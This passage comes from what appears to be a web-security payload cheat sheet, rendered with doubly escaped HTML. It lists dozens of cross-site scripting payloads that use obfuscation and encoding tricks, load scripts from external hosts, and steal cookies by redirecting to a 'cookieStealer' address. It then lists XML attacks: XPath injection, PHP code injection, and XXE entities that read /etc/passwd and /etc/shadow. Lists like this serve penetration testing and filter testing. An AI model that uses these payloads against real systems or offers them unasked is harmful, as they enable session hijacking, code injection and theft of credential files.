&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;&amp;quot;--&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;lt;SCRIPT&amp;gt;alert('XSS')&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;gt;'&amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;quot;&amp;lt;SCRI&amp;quot;&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;a href=&amp;quot;&amp;quot;about:&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/style&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;blah&amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;gt;&amp;lt;script&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;script&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;script&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;lt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;ltscript&amp;amp;gtalert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;ltscript&amp;amp;gtalert(document.cookie);&amp;amp;ltscript&amp;amp;gtalert&lt;br /&gt;
&amp;lt;xss&amp;gt;&amp;lt;script&amp;gt;alert('WXSS')&amp;lt;/script&amp;gt;&amp;lt;/vulnerable&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=javascript:alert(&amp;amp;quot;WXSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x09;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x0A;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x0D;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;lt;/script&amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;gt;&amp;lt;/SCRIPT&amp;gt;!--&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;=&amp;amp;{}&lt;br /&gt;
'';!--&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;lt;name&amp;gt;','')); phpinfo(); exit;/*&amp;lt;/name&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('XSS');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('XSS');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
